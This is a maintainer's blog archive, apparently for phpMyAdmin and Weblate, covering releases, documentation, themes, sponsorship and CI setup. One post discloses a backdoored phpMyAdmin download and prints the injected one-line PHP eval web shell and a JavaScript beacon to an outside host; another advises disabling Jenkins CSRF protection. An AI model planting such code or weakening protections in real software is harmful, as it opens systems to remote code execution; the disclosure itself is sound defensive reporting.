Michal Čihař - Blog Archives for phpMyAdmin

I was quite unhappy with shape of our documentation for some time, but this week I finally found some time to dig deeper into conversion into something more usable.

Nowadays I'm mostly using Sphinx for writing documentation, which allows to easily write using RST and provides output to various formats. Together with Read the Docs service, it makes great combo for providing user documentation, which I use for example for Weblate.

So with a little bit of magic in Python and Beautiful Soup I was able to convert most of the HTML documentation into RST without tons of manual work. The resulting source (and ugly conversion script) temporarily lives on my github and generated documentation is available on Read the Docs.

There are of course still many things to improve, but I think even right now it is easier to navigate than previous monolithic HTML file.

Now we need to decide if and how to integrate this into official repositories and I can then continue on improving the documentation content.

As Weblate release is getting closer, I've decided to give new version more testing in real life and it got deployed at http://l10n.cihar.com/.

This release brings quite a lot of new features, most interesting for users might be:

• Better and new consistency checking.
• Better support for Android resources.
• More visible data exports.
• New buttons to enter some special characters.
• Support for exporting dictionary.
• Checks for source strings and support for source strings review.
• Support for user comments for both translations and source strings.
• Better changes log tracking.
• Changes can now be monitored using RSS.

You can see full list of changes in our documentation.

As usual, I hope this upgrade will go smoothly and won't cause any big problems :-).

Today, I've finally found time to process new themes for phpMyAdmin. Result of this are two theme releases.

First one was just a minor update to older theme (Darkblue/orange 2.11), which fixed behavior in Internet Exporer.

Second one was completely new theme for phpMyAdmin 3.5 - blueorange (I admit the name is not too creative). This is actually first contributed theme compatible with 3.5 series.

Of course you can find all of these on our themes page.

Yesterday, phpMyAdmin security team has been notified about backdoor being distributed together with phpMyAdmin zip file on one of SourceForge mirrors.

We quickly analyzed the issue and confirmed that the backdoor is indeed present in phpMyAdmin-3.5.2.2-all-languages.zip file. It allowed anybody to execute arbitrary PHP code, there was file called server_sync.php which simply called eval on passed data:

<?php @eval($_POST['c']);?>

In addition to this, javascript code has been included, which could allow attacker to track vulnerable installations:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

All in all looks like simple, but quite effective way to install backdoor, if they would be able to spread this more widely. We've immediately released PMASA-2012-5 to notify our users.

Luckily this was spot quite fast (looking at used domain, the exploit could not be alive before 22th September 2012) and not on much frequent mirror (based on SourceForge official statement about 400 users have downloaded the file with backdoor).

What still remains unclear is whether this was really only targeted on phpMyAdmin, or there were more modified file on this mirror (SourceForge hosts thousands of projects). I've randomly tried few our other download options from this mirror and none of them was affected, but the mirror was taken offline before I could do some more systematic analysis, so this question can now be answered only by SourceForge.

We've decided to accept sponsorships of phpMyAdmin in more official way. So if you or your company want to financially support this software, you now have great chance to do that.

Time to time we've received offers for sponsoring, but we never got to point where we could easily handle these. In the past we were limited by sf.net requirements for no advertisement on website, but it got leveraged over the time and we did not change our policy much.

For now the only benefit we are providing to our sponsors (besides good feeling that they are supporting good project) is logo and link on our website. In the future we might add some more, but at first we want to see how it works in this scale.

Anyway if you are interested in sponsoring phpMyAdmin, you can do that on our website.

For some time I thought it is not effective to use polling to get latest changes from GitHub into Jenkins, which we use for continuous integration, but II was always too lazy to investigate.

Today I finally took a look at it and it turns out to be quite easy:

1. Enable Github plugin in Jenkins.
2. Enable "Build when a change is pushed to GitHub" in project configuration in Jenkins
3. Disable "Prevent Cross Site Request Forgery exploits" in Jenkins configuration (to prevent bug JENKINS-10263).
4. Configure Jenkins service hook in GitHub to trigger your server (the URL is http://<jenkins>/github-webhook/.

Try testing the hook and check "GitHub Hook Log" in Jenkins if it really works and you're done.

So now, phpMyAdmin's tests should start as soon as somebody pushes changes to GitHub.

Even though I've planned to do this on Monday, it somehow slipped to Wednesday, but I've finally filled in GSoC 2012 evaluations for all students I mentor at phpMyAdmin.

Generally all of them perform quite well, but there is always room for improvements :-).

The greatest pain every year is filling up evaluations for more students - every each of them starts with same questions for mentor (eg. how many GSoC did you participate in or how much time you spend on GSoC). I know I can copy and paste answers, but still this looks like something not necessary. Also some information is probably already known to Google (eg. in which years I did participate in GSoC).

Pretty much on schedule, Weblate 1.1 has been released today. It comes with translation updates, bug fixes, improvements in working with Git repositories and brings support for offloading indexing.

Full list of changes for 1.1:

• Improved several translations.
• Better validation while creating subproject.
• Added support for shared git repositories across subprojects.
• Do not necessary commit on every attempt to pull remote repo.
• Added support for offloading indexing.

You can find more information about Weblate on it's website, the code is hosted on Github. If you are curious how it looks, you can try it out on demo server. You can login there with demo account using demo password or register your own user. Ready to run appliances can be found in SUSE Studio Gallery.

Weblate is also being used https://l10n.cihar.com/ as official translating service for phpMyAdmin, Gammu, Weblate itself and others.

If you are free software project which would like to use Weblate, I'm happy to help you with set up or even host Weblate for you (this will be decided case by case as my hosting space is limited).

Update: Weblate appliace has now also been updated to 1.1.

Upcoming Weblate 1.1 is now installed on both http://demo.weblate.org and http://l10n.cihar.com. There release is almost ready (I plan to add only one minor feature) and this setup was done to get more testing in real life setup before making actual release.

As you can see from list of changes, there are no big changes from user point of view. In case indexing offloading is enabled (what is the case for l10n.cihar.com), the interface should respond more quickly while translating (and not produce errors in some setups). The rest of changes are even more hidden, like smarter handling of merges and commits (still there is place for improvements here) or better validation of admin forms.

Anyway I hope to complete missing features and do possible bug fixes in first two week of July and you can expect 1.1 to be released around Friday 13th.

Today, I wondered how much translations were done using Weblate since it was born. Of course I can give only numbers for services I maintain, the biggest one being translation server for phpMyAdmin, Gammu and Weblate.

Looking at the logs, the server l10n.cihar.com helped to contribute over 20000 (actually little bit more as tracked are only changes after releasing Weblate 0.8), what is quite impressive number. Of course biggest amount of contributions came in time of preparing phpMyAdmin 3.5.0 release, where I gave it huge amount of publicity (AKA spamming my blog), but number of people accessing the website still grows since then (still number of submitted translations is slightly lower).

Now as 1.0 release proved to be quite stable, it's time to focus on 1.1 development, which will bring offloading of fulltext indexing (it was proven to be unreliable to update index online for bigger sites). Almost all issues targeted for 1.1 are already fixed and all what needs to be done is testing in real life situations.